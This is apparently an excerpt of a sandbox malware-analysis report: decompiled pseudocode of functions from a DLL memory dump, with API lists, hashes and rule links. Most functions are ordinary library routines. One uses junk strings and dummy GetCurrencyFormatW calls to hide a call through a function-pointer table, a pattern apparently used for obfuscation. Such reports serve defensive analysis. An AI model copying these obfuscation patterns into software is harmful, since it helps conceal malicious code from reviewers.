					E100100ED(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					 *(_t91 - 4) = 2;
					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
					_t64 = _t74 * 0xafc80;
					asm("cdq");
					_t86 = _t64 % _t80;
					_t90 = _t90 + 0x64;
					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
					 *(_t91 - 0x70) = _t64 / _t80;
					E10010BA6(_t90);
					_t67 = _t91 - 0x78;
					__imp__#420(_t67, 0x1003b2dc, _t90,  *((intOrPtr*)(_t90 + 0x20)));
					__eflags = _t67;
					if(__eflags < 0) {
						 *_t90 = 0;
					}
					 *(_t91 - 4) = 1;
					E10010141(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
					E10001260( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
				}
				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x10038068;
				E100102E5(_t91 - 0x54);
				return E1001FCB0(_t74, 0, _t90);
			}

0x10014290
0x10014290
0x1001429a
0x1001429f
0x100142a4
0x100142a6
0x100142a9
0x100142b2
0x100142b5
0x100142c8
0x100142e0
0x00000000
0x100142d8
0x100142d8
0x100142d8
0x100142e3
0x100142e3
0x100142e9
0x100142ec
0x100142f5
0x100142f9
0x10014300
0x10014308
0x1001430f
0x10014318
0x10014320
0x10014327
0x1001432e
0x10014331
0x10014334
0x10014336
0x1001433a
0x1001433c
0x10014340
0x10014340
0x1001434b
0x10014358
0x10014362
0x10014366
0x1001436c
0x1001436d
0x1001436f
0x10014373
0x10014376
0x10014379
0x10014384
0x10014388
0x1001438e
0x10014390
0x10014392
0x10014392
0x1001439a
0x1001439e
0x100143a6
0x100143a9
0x100143a9
0x100143ae
0x100143b5
0x100143bc
0x100143c6

APIs

__EH_prolog3_GS.LIBCMT ref: 1001429A
GetObjectA.GDI32(1000ECC8,0000003C,?), ref: 100142EC
GetDeviceCaps.GDI32(?,0000005A), ref: 1001435C
OleCreateFontIndirect.OLEAUT32(00000020,1003B2DC), ref: 10014388

Strings

, xrefs: 100142F9

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
String ID:
API String ID: 2429671754-3916222277
Opcode ID: 972f0215ef0ccbc12416d13741993935b9c68b8aa4feb48cc9734c8c3317cb7c
Instruction ID: 2f8d2d43e09bdf50e625724661aa14f311a958ac26713a9e64237ed0808844fe
Opcode Fuzzy Hash: 972f0215ef0ccbc12416d13741993935b9c68b8aa4feb48cc9734c8c3317cb7c
Instruction Fuzzy Hash: C7417E74E012989FDB11CFE4C941ADDFBF4EF18340F10815AE955EB2A2EBB49A84CB11

Uniqueness

Uniqueness Score: -1.00%

Function 10006878 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10006878(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x10045580; // 0xe155dca3
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_v172 = 0x10044410;
					E100209E8( &_v172, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, _t38, _t42, _t43);
					_t40 = E100105C8(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
						_t35 = E1000E58E(_t40);
					}
					return E1001FC9C(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E10020F40(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x1003720c;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x10048668 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x10048668 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E1001FBB5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}

0x10006879
0x10006883
0x1000688a
0x1000688e
0x1000688f
0x10006890
0x10006896
0x1000689f
0x100068a2
0x100068a5
0x10004e6e
0x10004e71
0x10004e7b
0x10004e82
0x10004e87
0x10004e88
0x10004e8f
0x10004e9e
0x10004ea0
0x10004ea3
0x10004ea7
0x10004eaa
0x10004eac
0x10004eac
0x10004eb6
0x100068b1
0x100068b4
0x100068b8
0x100068b8
0x100068b9
0x100068bc
0x100068bd
0x100068bf
0x100068c2
0x100068c7
0x100068cb
0x100068ce
0x100068d0
0x100068d5
0x100068d9
0x100068d9
0x100068dc
0x100068df
0x100068e1
0x100068e1
0x100068f2
0x100068fa
0x10006902
0x10006905
0x10006908
0x1000690c
0x10006911
0x10006914
0x1000691b
0x1000691b
0x1000691f
0x10006921
0x10006924
0x10006928
0x1000692b
0x1000692d
0x10006930
0x10006933
0x10006933
0x10006933
0x10006938
0x10006944
0x1000694c
0x1000694d
0x1000694e
0x10006953
0x10006954
0x1000695c
0x10006962
0x10006962
0x10006967
0x1000696a
0x1000696c
0x10006971
0x10006974
0x10006974
0x10006975
0x10006975

APIs

GetMenuCheckMarkDimensions.USER32 ref: 10006890
_memset.LIBCMT ref: 100068F2
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10006944
LoadBitmapA.USER32 ref: 1000695C

Strings

, xrefs: 100068B1

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: ea71f620d712e899bef3bb1e0d5e5f775c8607f1766b4d53775585144692bc44
Instruction ID: 7502f03d00862ab63d890e742e6b2e485ad896773ebef231c484e9e01049f3a3
Opcode Fuzzy Hash: ea71f620d712e899bef3bb1e0d5e5f775c8607f1766b4d53775585144692bc44
Instruction Fuzzy Hash: 9E31C572A0025A9FFF10CFB8CDC5AAE7BA5EF48384F25452AE906EB195DA309944C750

Uniqueness

Uniqueness Score: -1.00%

Function 10002863 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E10002863(intOrPtr* _a4) {
				int _v4;
				intOrPtr _v8;
				intOrPtr* _t26;
				short* _t32;
				intOrPtr* _t33;
				intOrPtr* _t35;
				short* _t36;

				_t32 = L"xadqsavcbdfewescGADW";
				_t36 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v8 =  *((intOrPtr*)(_a4 + 4));
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t36, 0, _t32, 0x22b9);
				_t33 =  *_a4 + 0xc0 + (_v4 + GetCurrencyFormatW(0, 0x11d4, _t36, 0, _t32, 0x22b9)) *  *0x100440dc * 8;
				if( *_t33 != 0) {
					_t35 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t36, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *_t33 + _v8 + 0xc));
					if(_t35 != 0) {
						while(1) {
							_t26 =  *_t35;
							if(_t26 == 0) {
								goto L5;
							}
							 *_t26(_v8, 1, 0);
							_t35 = _t35 + 4;
						}
					}
				}
				L5:
				return 1;
			}

0x1000287b
0x10002883
0x10002891
0x100028a3
0x100028bc
0x100028c7
0x100028e6
0x100028eb
0x100028fc
0x100028fc
0x10002900
0x00000000
0x00000000
0x100028f7
0x100028f9
0x100028f9
0x100028fc
0x100028eb
0x10002904
0x1000290b

APIs

GetCurrencyFormatW.KERNEL32 ref: 10002895
GetCurrencyFormatW.KERNEL32 ref: 100028A7
GetCurrencyFormatW.KERNEL32 ref: 100028D7

Strings

xadqsavcbdfewescGADW, xrefs: 1000287B, 10002880, 1000289C, 100028CE
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 1000286D, 10002883, 10002888, 1000289F, 100028D4

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 99384a53e1d54a21adb6f768068eea20c85cdecf5cf15f71da9327b643da0e1d
Instruction ID: af9e15b59c393e0d8099aaf98a9213ea7197e89f84b9fb059b6d85f6975e4071
Opcode Fuzzy Hash: 99384a53e1d54a21adb6f768068eea20c85cdecf5cf15f71da9327b643da0e1d
Instruction Fuzzy Hash: 7811BFB1604319BFE700DB55CC89F17BBECEB89754F12441AFA40EB291C771AC008B60

Uniqueness

Uniqueness Score: -1.00%

Function 10007AB6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10007AB6(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E10008D3D(__ecx, __eflags, _t26) == 0) {
					_t10 = E1000B1DD(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E10009199(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E1001113D(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

0x10007ab6
0x10007ab6
0x10007ab8
0x10007abd
0x10007ac6
0x10007acf
0x10007ad4
0x10007ad6
0x10007ae2
0x10007ae2
0x10007ae9
0x10007b44
0x00000000
0x10007b47
0x10007aeb
0x10007aee
0x10007af1
0x10007af8
0x10007b02
0x10007b04
0x00000000
0x00000000
0x10007b0d
0x10007b12
0x10007b14
0x00000000
0x00000000
0x10007b1b
0x10007b21
0x10007b23
0x10007b30
0x10007b3c
0x00000000
0x10007b3c
0x10007b26
0x10007b2c
0x10007b2e
0x00000000
0x00000000
0x00000000
0x10007b2e
0x10007af3
0x10007af6
0x00000000
0x00000000
0x00000000
0x10007af6
0x10007ad8
0x10007adc
0x00000000
0x00000000
0x00000000
0x10007ade
0x10007ac8
0x00000000

Strings

Edit, xrefs: 10007B06

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: eb2d6067ed4edb110068bacdbfa1c270ab431b469ec304405f5743e5f3c6169e
Instruction ID: c236510ebf9aa878e60991b13e4b4610bd432db7ec560ce308cb7ed9e00e23a0
Opcode Fuzzy Hash: eb2d6067ed4edb110068bacdbfa1c270ab431b469ec304405f5743e5f3c6169e
Instruction Fuzzy Hash: 1301AD30B00252AEFA52D6208C44F4EF7A9FF457D5F104529F54AD60BACB68E860C621

Uniqueness

Uniqueness Score: -1.00%

Function 100143C9 Relevance: 7.6, APIs: 5, Instructions: 108
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E100143C9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;

				_push(0x14);
				E1001FBC4(E10033F57, __ebx, __edi, __esi);
				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
				if(_t55 > 0xf) {
					L21:
					_t56 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t55 + 0x10014589) & 0x000000ff) * 4 +  &M10014561))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L4;
						case 1:
							_t59 =  *((intOrPtr*)(_t68 + 0x10));
							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							__eax = E10014A76( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							L3:
							 *_t59 = 0xb;
							goto L4;
						case 4:
							__eax = E1001044F();
							__ecx = __ebp + 0xc;
							__eax = E1000424F(__ebp + 0xc, __eax);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E10004C10(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = E100100ED(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = E10010141(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E1001370D( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E10014290(__ebx, __esi, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__eax = E1001044F();
							__ecx = __ebp + 0xc;
							__eax = E1000424F(__ebp + 0xc, __eax);
							_t44 = __ebp - 4;
							 *_t44 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t44;
							L19:
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E1000AE99(__ebp + 0xc, __edi, __esi);
							__ecx =  *(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = E10001260( *(__ebp + 0xc) + 0xfffffff0, __edx);
							L4:
							_t56 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E1001FC9C(_t56);
			}

0x100143c9
0x100143d0
0x100143da
0x100143e3
0x10014556
0x10014556
0x100143e9
0x100143f0
0x00000000
0x10014416
0x10014419
0x1001441e
0x00000000
0x00000000
0x100143f7
0x100143fa
0x00000000
0x00000000
0x100144ca
0x100144cd
0x100144d0
0x100144d5
0x100144da
0x100144dc
0x100144de
0x00000000
0x00000000
0x1001440c
0x1001440f
0x100143ff
0x100143ff
0x00000000
0x00000000
0x10014532
0x10014538
0x1001453b
0x10014545
0x10014548
0x1001454f
0x00000000
0x00000000
0x100144e7
0x100144ea
0x100144ef
0x100144f5
0x00000000
0x00000000
0x10014426
0x1001442a
0x1001442c
0x1001442f
0x10014432
0x10014448
0x1001445a
0x1001445d
0x10014463
0x10014466
0x10014469
0x10014469
0x1001446e
0x10014474
0x10014477
0x1001447c
0x10014483
0x1001447e
0x1001447e
0x1001447e
0x10014486
0x00000000
0x00000000
0x1001448e
0x10014492
0x100144ae
0x100144ae
0x100144b1
0x100144b6
0x100144b9
0x100144bb
0x100144bc
0x100144bf
0x100144c2
0x00000000
0x10014494
0x10014494
0x10014497
0x1001449d
0x1001449f
0x100144a4
0x100144a8
0x00000000
0x00000000
0x00000000
0x00000000
0x100144a8
0x00000000
0x00000000
0x100144fd
0x10014503
0x10014506
0x1001450b
0x1001450b
0x1001450b
0x1001450f
0x1001450f
0x10014512
0x10014515
0x1001451a
0x1001451f
0x10014522
0x10014525
0x10014528
0x10014404
0x10014406
0x00000000
0x00000000
0x00000000
0x00000000
0x100143f0
0x10014558
0x1001455d

APIs

__EH_prolog3.LIBCMT ref: 100143D0
SendMessageA.USER32 ref: 10014448
GetBkColor.GDI32(?), ref: 10014451
GetTextColor.GDI32(?), ref: 1001445D
GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 100144EF

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Color$H_prolog3LocaleMessageSendTextThread
String ID:
API String ID: 187318432-0
Opcode ID: 6309156ecb13da3d4968e683f2a6bd285be12691599974598d928356da355451
Instruction ID: aaf9ea3742fe6bc6e7247e3e7f83f19f993380783e2d83981db4afd0f75aeedd
Opcode Fuzzy Hash: 6309156ecb13da3d4968e683f2a6bd285be12691599974598d928356da355451
Instruction Fuzzy Hash: 1541457450074ADFCB20CF64C884A9EB3B0FF08310B128919F89A9F2B2DB74E890DB51

Uniqueness

Uniqueness Score: -1.00%

Function 100071AD Relevance: 7.6, APIs: 5, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E100071AD(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x10045580; // 0xe155dca3
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E1001FBF7(E1003305F, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E1000563B(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E100071AD(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E10001260( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E1001FBB5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}

0x100071ad
0x100071b4
0x100071b8
0x100071bf
0x100071c5
0x100071cc
0x100071d1
0x100071d9
0x100071df
0x100071e5
0x100071e8
0x100071eb
0x100071f1
0x100071f5
0x100071fb
0x10007209
0x1000720f
0x10007211
0x10007213
0x00000000
0x00000000
0x10007215
0x1000721b
0x1000721f
0x1000722b
0x10007237
0x1000723b
0x10007241
0x10007245
0x1000724c
0x1000724e
0x00000000
0x1000724e
0x00000000
0x1000724c
0x1000726f
0x10007275
0x1000727f
0x1000728a
0x10007277
0x10007277
0x1000727d
0x00000000
0x00000000
0x1000727d
0x1000728f
0x1000728f
0x1000729a
0x100072a2
0x100072a3
0x100072a4
0x100072ad
0x100072b2
0x100072b9

APIs

__EH_prolog3_catch.LIBCMT ref: 100071CC
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 100071EB
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10007209
RegDeleteKeyA.ADVAPI32(?,?), ref: 10007284
RegCloseKey.ADVAPI32(?), ref: 1000728F

Part of subcall function 1000563B: __EH_prolog3.LIBCMT ref: 10005642

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
